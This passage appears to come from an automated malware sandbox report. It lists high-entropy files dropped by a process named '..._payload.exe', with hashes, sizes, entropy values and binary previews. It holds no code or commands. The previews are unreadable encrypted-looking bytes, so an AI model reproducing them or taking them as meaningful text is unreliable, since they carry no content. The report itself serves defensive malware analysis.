                                                                                                SSDEEP:48:+pVRWm+BIWEreL5+6wJceIGIjSYaF/v0Nco0Kx+oLD:+h+0SbQVIGsw0Nco0Kxz
                                                                                                MD5:AF0061B11F05F2ADA592618315E0B909
                                                                                                SHA1:D35B25AAD40581CE3307027EFE8594352A9E3D59
                                                                                                SHA-256:4665320AE3D6ECDA4B222D9FDEEE45808770510A1D3500C58E38EAC9B80D9D18
                                                                                                SHA-512:A1CB5A4FEED8672643317EB6FBF22AAFDEAEBBC1DFBD71AE800EF15331962578EF68AD1E56F5C45077EA2412FF16034F0BFEEC2F72ADCA125D1A07F80D58D848
                                                                                                Malicious:false
                                                                                                Preview:.<?F'6~.A...t.cM......tgw..D'+m?.T.,...=._h^.......f...[iL..C....)..z..k.........tpC.\...k8[.wjI.O.....%y...........k......./@..t..Z..%.,...ja..(.....swP.O.0........ii2...\..D....*4.[[.J.7Y^z.Q.^.74..I....b..c.L.6..2....%.|@x.....u.\)......$......_........K.>...!s.....0..^O.,!..Q....@.w.o....;cb6...X..'.H,)v.TO[...).gl.G..*....]...~.d...B........=..<..$....d...=X...n....EM....S.=..r.d....p]....3g...M..W.Hi.l...:..O......2....`.j..v;)R..V....}dk\......?\..(..3..2.>(.iH:[.{..t.r..<*X.,._....$.C.|.M.C!%l5.-.2....%^I:'.U%8.....)].<.'0_.[.B.h.zb..fc..{.q..z..%MmUa.x8.U.......l....S.JC.0..-.2}....}F...... .!g^..g1T....7...j..X...QaX.,.;M........~..T....v.w."...8..4.....W..".R...g...h".$.L'E.........7....*&..^y.......OZ.........t.........V.D.9.....4...n....i..(28.j..+.pP4...i..._..(.....\..KV./..S@....@.U.%o...C..MTF.U.EeL..A@..y....Q[.!.$<...g.>)..0......q.s.....K.Q..8.4....-.+.@pC.7...Wq7.Bj.$H.c.7u.y^............)j../G.... ."
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1749
                                                                                                Entropy (8bit):7.878263204892405
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:laNPX5Rvts3hwqDc+htt2luPGhz+W2ojEMduaKST4LD:sXjvSqqj92luuhz+W2oQOXA
                                                                                                MD5:18AFBB81F7080DCD35608DD343DC27BD
                                                                                                SHA1:2997A8BB1D13EE976C9BDFD9DF12071CF8647E7B
                                                                                                SHA-256:71D0E659326BECB3F8459FE0480EF881DFBD13843A072BB43D39D73A7DE88DAC
                                                                                                SHA-512:D2CDA02C15829E322A20AB1D2919A9E7A0F26FB3FC4F06FE3727A3F0E7DE39227E30B0B797F822982C0290A5D8C2447FD0CCC8557AD490E747F5FF6A4EFA64EF
                                                                                                Malicious:false
                                                                                                Preview:.<?....;......6......>.?....(.a.P.........2..[~d...P.,\.QO.....,u..Ej..h..e.`.._.-M.....x|.'.......jf..6..........bC4"..2..X....8.Z...Q.I..c..l ..M.;.L} b..6[.2%e..u$Uu...).[b/...^.....t=.i6F,...?Z.[f^N.....F.U].M$.....E...oLx.........'.Ht.S.k......JG.&C................`......^...~.....&..fll....._p.d..r....3A#y...O....6..v......j..n&.......[k..A`..^.C..u.H..\..Q.=.3.(..x...R...C.....sz...a..g,e.c.S.H..u$....&W......x..K..R.G.............".n0.8.)..6.,..U.......O..5.....P.(g.q.'...9..-.o..B..l.....}.^..X...h../BU~....1[..{j..q.6].W._...*c(X.RjsO.$.X.:Q.IV...e.[..b...8p..+.Z.....Z../k....U..U.b.#...".ML..xI"@.~.....z0.......q..~B..`....^v..t.._(*...8...5...<..@...e.P...K....d..W.f.a.g&,....4.(...`%x.D..p....!t...b\.ud.....q.+..H..@.i.........NE..x.......Q...q.,_|8..........,B.A...V.. .oH...v?.......2.}.[a0K.pR!....c6DIKB.=.hr.y.fYZi.....Z^e..b..vT....M0S}?5../.o"$.;.+..+...x.,.?c.)......|NG..';~._.BL...s..c...R}.[.4k..~?.8.9
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1706
                                                                                                Entropy (8bit):7.889465364890318
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:1QhfY7lZO+7aiB/djgmu5N4iAcxbt7KO05ZXV4LD:1n7++20jgb5gOyJK
                                                                                                MD5:7953C9A3D6301C640A4477DD9E876CB3
                                                                                                SHA1:D35BBF0716D26334FC2274BF99F093C991CAA1CB
                                                                                                SHA-256:6D88F3260BA40BB7D630D088E1AB70805C956284B5C2DA1C2A0356F4198DD4CD
                                                                                                SHA-512:9171AF28852EE1502AEA21871CC64C9BE83EF7D1B214D48DB4F566937512E961EAD30785E1408E57B9D91DD1AB72B7B9E48F6C55A1804206E955EC206FE357F5
                                                                                                Malicious:false
                                                                                                Preview:.<?..~.$...I.d.5.....+j(...X....i....}6o2].V.I}C.1.x0..e.....p..z..34..M..e9c...8.../@X..yd.......'~X...G......O/.3...%.-t.!/.Rl...&..p..Rx.qk...,B%.2..gV...|I.>...,.a.......j........;Hg...%/.h..B7..}. ...xA.J.M...W.*I.........:........ ....k*AS...$.s...LA.Q..R!j.......i?.$.DY...n.e..e..7I.S...V...x...C..Z/.m...+:..o......2.\..2lz..n.......~K (...xFw...R.4..[k4.Z_y.].;....BL-,..y.Y..".@.f.).....2.....W.........T..j....y.....+.i'..jM+Ac..b..6A..T.`.q..U`..QT..~{.2...Wi...}I.b..F,......V.#....h.V.z...u.7<...+..`}!b.m.e.^..r...n[.U......?.soV!..r..`....9.uo...\#=.A...LU..m.......Y.......u.}..Q8k ..IT.|..rf?*....9&..O..g."...-.h.m.Iz.-:t..'..'#..{...Z......x7...3_...f.B..|.6...j...c.6.......n[..~VL\.....u.$n.z...8\..0..E...Z....T......3."bYM...q...)...ar/*..-vy.&../.y@....Mv.yCX:6........=.V.q51.8...,D.w...=..p.'..Q..a.Fc..:?..s5....f..s.D.c.YIX....>#..:.;I........av.u...!O...I_x.Q...f......!..R...`......=WG6q.....S.(.q.c4...T'j...bP..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1743
                                                                                                Entropy (8bit):7.884668334453095
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:qgH7YdvDBxx+Uq3WAVXBRs8RXUPJSFiFuAdsLt+jLD:qg0dv1S3Hv4to9EL
                                                                                                MD5:33745E3FB8DF997A7F195C8EC8556D22
                                                                                                SHA1:E0F97E180AEF272FA5C59CAFD7E6176049E8D73B
                                                                                                SHA-256:CF449C698E559803032077B93F1B676E60DA34811A4BDBA80B3AB75B69740DA0
                                                                                                SHA-512:B3739D36CFF87A6E16BB75E945846D7C6E1636C0B52414F62CBEDEA797212C29D72DEB8471ADD238FED02C40A12995A70396D07DD22ACDD90464F091421F182B
                                                                                                Malicious:false
                                                                                                Preview:.<?../U.,..........d..>UBY..).f."*;...}...:.!l..S.r..Q:8g.}9N.b..$Y.....[..6..y..@$.vv....S0[..2.QM.S...C,R........%J....A.4j.!Hpv...+.0..^..Z..a..........._..g..K...U....0......d.(0.....1t.%..U.n.w.0<.p@..5c...i..1...a......|.B.z...a..).:.OJQ.c'.>.[~ON/.11.A4k..z.!...........n (h..NX.Y?..k.rB..l.)..\....t...5.Y....jaK..E.,`..x }%DQ...4iv.'......t..u......D...\...f=..#..^......%..K....W.....B........r....%.,...C....9.....eA.w.2..w.C...X|..o.E...B...d...8G..m..D..@.4.....!V........'.(^1\.C..B.+...6......t.R.V3!...Q....W8q.......*o..).%.d.9..K.V.|.p.....lp3T..Qq..-20R.a..[.@.M.F.....L.A.$..........=...A_5!<......-Z.*R..L.2.X~......b..5.r.p.D..u.m....8....hT.)..o.\....}7..+:...\G./I\${..3O7C...78...nlO...[ .....c.E}^......8..?M.....y.....F..J.=...S..V./S`=...X..a&.1OxM.8`...+...X...r..;..w..O1.I\...b|.IT=..U.^`._w.h.........*4.s...c.u./..h..v....-<...)Y3.K9xN...X}..$._...#QR,3%....Y...6...q..........qk1....=.P.C.v..5..1O=.=.Y8.Ff
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1692
                                                                                                Entropy (8bit):7.879158199789408
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:OYl6uRidPL0szhyao8jRu7pKxrHrZrXNsLD:TFYdjtV1Fu7A1tra
                                                                                                MD5:E648786D0B441ECF698DF3D2F6FC67BB
                                                                                                SHA1:74F6BDADCBF0F692E71E055FCA27667A296AD47B
                                                                                                SHA-256:3D24D1EC85AF8545AEBF1140395FD0A34C9C6CA6C1D9D77406B9A76BF4375754
                                                                                                SHA-512:9508763A697E77B29FAB92B1CF53FCF09E7070FB1B81466F1DF4AEA5530F5938AFF0C53789E247681F356BF7D7F43D1A16E45C14FD9EFA4E88547611F2C82FD1
                                                                                                Malicious:false
                                                                                                Preview:.<?.h...'...D..$...nxm_X...._.:..b!$..+.E.`R....<....< ._...g.H.u..<.....l^..Q.yW..k|..J..$Z[..Y...e.-py#".@..$.F.....z.a.0.{....6.E..Kl.tj.I.7V.q..O.(...O..8$..8[...1...r..{t..~.6....4>.tI.}&.ga.|<k.`k....D...U.1..."..iC^.=.d.V.?".pY.&..L e.....O...0..R3..^......t.....cn.y................-b.>....-..l.v....f..@........?..,......B..x..w.%..uj?`........-..s|.q....`..Y...#..og...>(r4..9.,,..........kOX..).....?...+.C{.....2.[.$`Fl..wM...D.e!.$...+{.....>ab.j.....4]........4I)i."..].t5.q..G..V..)..F.s.W........S....o..N.....D..9...YR.H........~$(.w.~T.).L..l......y}1.....J{6v...`&..l".8......@.. /...a.5?..!'..=...6,....5. ..4p.c.L.ST.j...jy...fK.g....<.{...|..z..uc..w.i.S.q.3..=Q]7....[..p^..Z6.q..1KTN..a.........!.|..j.$.....\\ht.!A.7.r.S...y.u....;...nz.u..Wp.J...1.....}Pc...-D......,....b.o.9B.~.n[...X.#.`}..S!..V...W..f..Y.)l.80Yl.....~t..........ro..Z.BRZ.?.vVM...[.B.m...i..q+...kv|]....C.Tf.yn..5.B^..5a!"..D]&.Q..Rl...Tb..@#..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1729
                                                                                                Entropy (8bit):7.884494125811604
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ZAyNwDO3gTizna4SQcBb7UUgWy74ADa4397LD:yyNPgTiNc0UgWMu4Nj
                                                                                                MD5:6EDFE5B9C948EA58C7A51B2A8C0B1923
                                                                                                SHA1:699EA89DD24CB61CE02D10C01CAED87E1C21C038
                                                                                                SHA-256:111EEFB435EF92429BE0E4C56577B2F6A7CBB94E9554CD4E4EC3333B5AF76A76
                                                                                                SHA-512:8E95A829D2775B2CC8856AE2AC30DCFB96835D8E10C564B62F0DA12008C1D103C646DDAF0327AF9A9566069C664330403E2E109FCFA570B883735F68D4C2CDE1
                                                                                                Malicious:false
                                                                                                Preview:.<?./Q...}.v6*!.0.E....?.B.K.5.......,.tE..497...]+:g.+PLZcy.$..7%..M.d...yH..(.w.]k..\~..........a.h.......3...z-./.....3..t.O..zU{.....;w...y..!.E..........BS{..,'..;@z...GI.Z9."....z...M..8n{p./.[.6m...H.L....$.x..s.i6{a.3...Ru.SUJ..;~Yj.\n...g8........M.?.....-."hR..M...7...'X .8.xz.....D....u.x=8R......"vYOh*>+...).X.V6v8..&l..<[X......../....K{...!&...|.....Z..?g..P]..........K.....O.\..r.K.$..J.8..6$.Zh.0...-X..a..#.Z.e.|qSQ....T.'..$*.E....e...Bm.{.m...0!}.@M.k.....-...(..N/.......7Y.....T.yGr ...i.U...B1=.X...<I...4...k.V.3b..u......|..~.~t.9.y..YB1..$VF.....Ft..{Udh..p..A.J.#..pl..........4<xF..m...g.W.}...R..b.W..-..b....`.VV.l".u....:^.3i[...:4h^~....C.x..X.{Y.._.Z..'...K....2?......"h..w...q.L....#H)..`..1.Wfe..w....9..8...@..."..Jc.;.15......rk..r...d.P......_....E.e(I..-|'...-q\.&.b,M...D...2"...ew...l..:!9U.H..j.B6.~j:...1J.@vh.>.e>....;....J..$8.8`;EC. [.&.D&wFI..."B.W....t...4....n.....Q3..2......=.#..!.0...w....{.....?...vE@......U.{..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1701
                                                                                                Entropy (8bit):7.857453306790761
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2E97fuPPnAkhlWg4sNXQwq02R2jLGSIog3LD:2e7fuPPAErtQwqnXSy
                                                                                                MD5:80C0BF8CA42060C95CEBE93F866BEB2E
                                                                                                SHA1:3C8A44D5D02D140762A344A4B53054CD44BA9EAD
                                                                                                SHA-256:457577F4F5381299250BC018D351F5114C3A9214EEF39ED2B4C83265636EEBCC
                                                                                                SHA-512:F14DF175130F35799B809EF8F8F8A7702C7224E09E53CA8629E54241504D7DDCC4E456E74A51234F798078A7B00D440048B64DF74ADB06D60BF1E93D50566016
                                                                                                Malicious:false
                                                                                                Preview:.<?...*C..:..:'|%qM...1.RK.v.V.t>..I.[.M80.C7.}..........c..7..........M...0..&%..fgu...70/{.dY...?.'y...G...:E...r-.<..g&.C-*l.'MO>...X.wI....n^....un......:.74..6.B...H...H...A...M*.m.+!.q-.....u!.....W.b.!c..T........<.CK../........w...+..J.$.iN).4.......P.Vb!..:.....gd.....9.......Q....g...`YB..?.f.M..a...=.......\..Y..o.......+y....4.>.J.z..@...P........*.12..........M..F.Bd....._Z...h..=.r?.....}[..6..f..t......1..8.p..PL.#.6....|.T.]V-...D6.V...-.m.*.)xM.c&.+.....s......:.H$dQr{f..E...!.!.....))<.$0.iC..&<a.....[.....4v.......G....O..{..S.}U.*z......w....9.ww..+.I'.n......%R?V..9...$H...x.[..Z.x.=..z... ...,*6~M...z.L....o-..YR..........?.!....C.?`..m+tC.Y..............x.......P..b.{......l..|..~.v..8..M....y...O.g....z.....E.Fvh~c..i......(..XB.............$.3.|....K.......(.EsGzL.>..;..}EV.... QE+..X..is...$..9..~A.}.x!..%.)..:O....(~n...b.V...8.]^.+5....+..J<.I}.8..YS`...Q]..=W..R..y6<).-..I..eQ.w0X......X...7.6.....49.O..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1738
                                                                                                Entropy (8bit):7.892464065031219
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:30GdRb+j30/K4gLtpICYYfd7504sdUuWIGobAqfLD:kwb+j0/KTLtDN04sdUz8P/
                                                                                                MD5:F882D175607FDAE85ED2016142BD7556
                                                                                                SHA1:DCEAEF864EAD301C2AEB9D77158D8268E6A49B2A
                                                                                                SHA-256:C518963A100D0F927CD77C7E9640BA7C1EF53C1A58882AA4DEE7B290C4224EE6
                                                                                                SHA-512:A9B87EDC78C430CE10C60F0B0E91FC8471C36B5FDB780C3E8A572DB1C145C00B75D9BD60752DED6DE861FACB035E372F4E37682631F8FB37860142DE600DED6C
                                                                                                Malicious:false
                                                                                                Preview:.<?p~U.j.....?.1u!.g..]..(.....9..!...b..T..*.z..~<...w.3...D.. ..../..D.w....0..:.5......p...D......~.^D.]...............k.u.h.Z.o1.l.a.F/nB,..&".,".5.....jt=JP...K./...pQ...g..xH/.e..r...<..Do.dT<...*.).....l.......0.[C.e.%9....Q..|.C..\V.....b....`..d....p.f....y..J)n.[....... ..g.8..w.f.r..S.b......n$...M6E..;....#.....Z..~...eFO..d>v.M..I.Wk..!.E...........'.u,.tr.~|J...u...a.A.K.Q?.q...<J-m.....]y..'..*...o..]v..~.....%...8ZsM..A.j...y.Z..P...V...9ZJck.{).W.......x.y}../..A.a.5.f.v...GI{|=p....q.V..U..6...M....'..V`wZ......eSX...,q).;.......9A.a.^-R.3...B.ld.....uN.........wH..U.H.%...I.W..1....n.......k.i....x....R..}3.....i...`...:.d......x.z..;._.....b9...G.#...+..1.<'_.=...[Y*ej...@bSh_*...H...............*..9.t....k......).Ed..9C./..`W....r....0.h..Am.(.V...OeB'.|.xC.*.H+...}....3.R.|....FA....8L.....{.......K4|.@.......F..7...r...P..".2H>..@. ...-9 .*....tz. .u7...)......j#...eC...........,...%.{.R..L.&.:6.ZS.B.....R.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1700
                                                                                                Entropy (8bit):7.880803462612066
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:PJiWvKxcjziLLMHasNcB2AwrMijvfCsl/JJ0rJwAztDLD:PJtK6CKasNi+Mil/2lwAztr
                                                                                                MD5:C1A8F33D6405B0B9C9C7427D80E49BFB
                                                                                                SHA1:A65BD067C8C4285A4307CBCFD1969613ED999DB1
                                                                                                SHA-256:7AA2A4CA01AB65607780873FAB145253F3173C3CB7FED73760B6864B04131830
                                                                                                SHA-512:D6D2551190450058376E363DC14FA4B732D595AF84AC05B07E12E5B6ED7A606FF19967B296995EDD7F093FF0449052F806C349D60A1132D54791886678687CF4
                                                                                                Malicious:false
                                                                                                Preview:.<?...8...Q.GLE...L...z....%CJ.}4..#..........#y$PQ..D.kx.....d.>...AYD@.F.H.?...N..K..1g....w..M...}.V.........Y.<1.e.}.].N7..q:...=...@.@...q......K..0......>.g.1.......{.;..".xz..E...nU...?zn.....N.oC.CJ!~..^...+......\9..m2.M.xeN*...y..g.(N(.#..C.\..D..&....M}.P.+.>.@]5i.|.W.B..sZ&+H.... .......7.....\. (.${....K....`.P..\.IV...:cTK../...4.fj'.\x#..._6.O].a.O..e0.../..*6.s.R \`$....&)........o..%.?.N..I.L.u.c2...8/.X...@..L..wV.2=.U3...j.e.......&....C#..$..w.().t.......f.0i|.dp.P.5.!..f...W....=U...kw...b.k>C...Fey...t..uhlQ.n....|.W.L.wz.n....F@..}n.[%....C.2..5t.S.....y....(..&)..0.1Q.9...N.r.....q.....#2M.8.+..|.g.b.3...}w?W....Zk...Z..-.8.....5..(.4..8....~r.a......9b.Y.h.m.|....%.N...LK....Q.......y..!..{..w.h..........7..2.i..jo....-R..Q...B...ZRt..J...O.l..;..D......6i....Z.q..$..=.b.;QX.pM...|.7...5).<...7...*o..8..t.O0\L..s".H..y..x.........-.7...+U7.......|..2...jC)3.gU...8~.......>.......dB.U.m...s.P08^...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1737
                                                                                                Entropy (8bit):7.891120887325261
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ou1FhoUwjCSG3pe5M0ml6Ldor94KU8SoZCLD:o9jh5M0m4SYroZC
                                                                                                MD5:2BF245AAA84D6C4DBFFC938F123476DD
                                                                                                SHA1:A8F27260511A2C27596D0DB4E68BB64FAB56F537
                                                                                                SHA-256:D6161793581A7D6309CE352493CE157DDA303E78AFAE58394611200B12BC4009
                                                                                                SHA-512:6845D01CEC467CF94D0FB35A916523A839E2866589BEB47B02305E5E196A4233F69934F236D5ADB5A4793D0D6A0F9128AE507EEAC0E6F269721C61FBA79F7A62
                                                                                                Malicious:false
                                                                                                Preview:.<?..\....`Y.......p V.E.+.q.....,....>.|.Z0....T"....!Rz....U...a.....<?.b......rL.8...>9.;.x..x...... ...Fp!..%...y..X..j....H#.K3^S.BK.7./&;...I.......Z...P<.m.w.^S..@+...5...T...l.)u..].._.tJ].k.^X...t......~..`...a.lv]#...~...X.....7`..._...9....6...y^.D.a.....,.....G...R%..F.oY.4..,....I....p?..3.....CYvA'"n...W.8L..Yt.1ZV.....G U0@...&..A...Rx...=...X..v..c...j...~...6T....D%kL...xU..^.3.......m:.V..Md1....s.....u.?.....H.8..kaAy......P:....../P.1....qR.6qY)..0..1V.d..i..x.)...!{(..<y).i.,..Y^..x..uI.x8.....<......^.z ...O..Uq...g.._...%/|...L..b.! ..........$..~E.Zl../6..k.9v[..e.HJB.g..U..P.....g.c;.[.........r...Ib..R.*.B.\.b.n.|..|O..$oc.W..Ks.:.~#E.?@..........;mKM.Plap.3Fm.JsnS`.....z.. ..i..}.\&....ghr`.xDU.].^.`6.M"..\....h.#..z....2.......aE...NM..d......*.<.*.......~....[O..jcL..>#]...R...m... +m.FH.(8r.R.QX.I.......0.scp(P4....LCF.]pj.=?....B.F%O4...2fw}...9k.t..+b......=L.?.w...p!h.....y...m.w.....2\...G........ .
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1688
                                                                                                Entropy (8bit):7.889092456793991
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:j9/TnVpoRtR9XRBHAjcjC8zAYo0tozdcTeL2wGLD:RZp+tR3BCcjBI0tQuTR
                                                                                                MD5:10A7DA8666FB9AB929774FAE344BF4B8
                                                                                                SHA1:42C6C182EFC2CFA8C91770568DB75A753CE1B279
                                                                                                SHA-256:E76ADB129E3AEB128379900138CE9AEF41D1ABEB33CA1488627D1D145609D2B9
                                                                                                SHA-512:1891F9767B2BB10373539CD9FA4EB682B72335B8D0A5460CC704B051217537D368B45A048BB92D6EE0CF7FE5693F3EAD51CF554FC5A80057CDAE96C785121098
                                                                                                Malicious:false
                                                                                                Preview:.<?....."2.c..<D.^0..cKrf.f .O..h.T...."..v.z..A...T.71....6....P.;.Al..`..l5`e.....DiN. .K!pIca.O..b..c..)...7...Z.S.I...1...1..d..$y&..A.xNoN..s..T.$.....wibO...h....<.U...[.4>.?..c../z%.@.D...(..l.. ..Vy.......US..V.U.....dx.p..@..f\...I.L.........EEJ.J.Yr....r..]..N.f.A#.`..)....P..L.j.I..6....Q{...CV...8...G...e....<...%.h.....{...{;....p.k......74...QuhV.e2.u.O 2..r.2M.};,..~..b....|.-zjs...c.]......_.I.`U.H...s>I..........y-.k...f..k.b...g.....Hs...f.....L.G..".S.w..B....zm.q.wx.k.E.QD.....|a.;Y.c\.l.m.9.H.....t...J.....)4.BdZ....1..U!`c.X.t".@-M...O....k...).....r..o...Ti...49.z. ......[.a.....`..E:..R./nL!.I.u....t..j=tH.s..,~x$.3.:U.V......52...7 ..w.$.-.....4P..6R.f...`.......s........h..n...q...n..,%F....{.X~}..@.w...>$.6v...u;.x...L.=. .#.*J..R%..m....HwU.."....;..]B.v&......hw.z..W*.s=.p2.xeiu.EA"a>'..[i &.1.`...K....X....9.5...=.nh...].....x...6v.....c..yO.e.F..`...`.X.....8k....pfe..P.<v.Bj.B_.a....)2
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1725
                                                                                                Entropy (8bit):7.881703011229132
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:Gif7i6LhmKNBj8f2rzf3tkr9mNGT90xWKdEXCOEQLD:G25Lhmxurzf3er91wEhT
                                                                                                MD5:B4045F5978A53168364B16C933FC6AB4
                                                                                                SHA1:2FF678D51567ACD67FCF3CB74A6EDB55FED09579
                                                                                                SHA-256:D2BDDBDB5416B97552C0338F98AD0254715630C1FF041E52C5F22175BA96494C
                                                                                                SHA-512:06A4ACFB880D0459104FF63FB07E8B86BEE0905028ED2BF446724E3AD1E0CB04F3EB29CAAC2513E27B3E5A6514A26436F4236042B67B0EB3D80CCF22BE38587E
                                                                                                Malicious:false
                                                                                                Preview:.<?_7......l.i.We..,..N..V3h..5....7K....|...-.U.Q5.......k..S...?.M}...ODf..<%.}.L..-.>.mE.q.....,.]t.Y?..e..w.f.Hz..qb5Q....p..U..8h...&)Y&{.-c.s.,).r.{.AV.y.2xi..7.9.,"z.QV.....v...L.!_.{..@rX..m.#.....g.i...L...|..S(.-?A2.q.|.n............2|..E......ij.....2.e..|g.5.Z...?...{..P[...]QS.n%...G3mZ.<7A.Y.u....h.F-.d....YkZ,1W.4..=K..N.a....Y*..y9Qz`X....j<.......~.v...$<.-.o.J..$eE.no..!O.6.[.>....!.[.k....G0........H....Y....;.N_.V.$...j.00..#...V2t:...\..h:.TN..+.E..?..m..;.n.]Q.X.,(...%.?.]....;.r.@w..Dy...]P.d?.C.yD.E_...U....."W......}<7...=.B..6..\.T.a/@.u.W..fo.R*.....p../.h.{.....V...Bep.m.6.'.f....w..G%.,.)jc.@Bp;}..5..cH.~..`d..(...V.C....K..$..."`....|..m\f..F...tO.DHN.6......C....CQ...lHd....HY.9.c"=n.%`.g...S....Z..%....k..Q.O......|Ta...].C$../<.m.~...R4.%....5. .......p!Hl.8t.....;%u.T....8.s..z.d.Y.*...^.+.....@ q.t./..yM.&b..8....w.!..I'..P..~3.s.`".p!..uI....r...D....J.... ..<4uq.")....`NK.........H...y.a".....4.o&g....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1702
                                                                                                Entropy (8bit):7.8719789878113815
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:7AF4SIdxaznTLIpPrAF5SqMDuxGZsyp5mLD:ndx+TLIB85unZt3u
                                                                                                MD5:12F0EABE14E0000649A62E624C5AC0E6
                                                                                                SHA1:08AC7383799BEB325242A104782EF31E48C42844
                                                                                                SHA-256:BC1A907CBF6E19A47FF7C135BD0A31B7E055D3845DF13C6A73D061F809AED774
                                                                                                SHA-512:571CF5DEB23C8D9B48500A75D58237F1136E7DF90D005DC4F0244729AFE6B839DE292F74FAD08D228A86CBCD04975109F37074962C0B23DAD2CD19E7F450EC4D
                                                                                                Malicious:false
                                                                                                Preview:.<?.......N9...Q.%5au0s./.N.~....\w.@...KW..CT.}G....c.#..+.*.A,.......]8.W`._iW.../..8.l.[.)......6}..F"uXE..~9.HPA.._@na..{...a.{.U.b.O5./E.Y!..ov..>..o}o..W.>P.....o.TS.j....ZU._t\..s..e.z.+l.?...../.|.....f...R.3..k.\F..zF...........4HA.v7.h.H...8L.F.<.t.W...`w..]Q.......t...b.KSQ..I..L.".B...s.Ke.U,.....y...Y.`.....m.A..e..+..h....@.=.p...3.2.........V...../.f-..`n$.:...tk....H...(%ISK..k.d.gu...3.&.\......`....B/..V. ..+...(....plM.C.}..9...{n.=.w...M.?..;.f........C...p...U.5.k.[.{5.wa...w....T...Q....C..?Ln^......O.i..iE2.u@7..lmF....m.)yi.2K...6.Y..g.y.I.t`.f!m..rhkE6.a....;h.&.0..:.....S.?..'.....g....ub~=..(B.g..o?..~..).....3....@8. {.?.1N..9.*ow.9n......F.w...|.k.(.."}..$...hs.14J.a<..v.....c. ...B.zy.j.(."G.;.|..4.....Q.d.D.?.a.x.Y...E.......n.&..d.-0..P..'..-7.....;"..7......-;.).W...?..8`..g.%...2L.Fv&.F..~x....~..8.h.../w........O....T.Qu.(..?.,F..g..j.`...^...F....../..&.*S.f..J.v......F80....R.x+..%...V....En|......
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1739
                                                                                                Entropy (8bit):7.878580692607044
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:33x5akNSoL5VM9quMNwVsn3H7iSaAanjn8LD:nxsWSC5VkquCJn3H7xzCDY
                                                                                                MD5:EA214EE8E929BE2E2D65B7C9E9A7E172
                                                                                                SHA1:F2C99D47DBE04F43B32FBCF808C9B3CF44A86058
                                                                                                SHA-256:9877CA0950BB3F2171D4A89E966F217B115B14F4FFC0657DC0306DA3FD00D304
                                                                                                SHA-512:E7E3213B42B65E0AD536C21E43CA032DF7F400CB1497ACA855AA68DDE9C9E35BEF422A4A973336A840DAC617BA1ED3C65C3343675DB88350564CF3BABFAF7B1D
                                                                                                Malicious:false
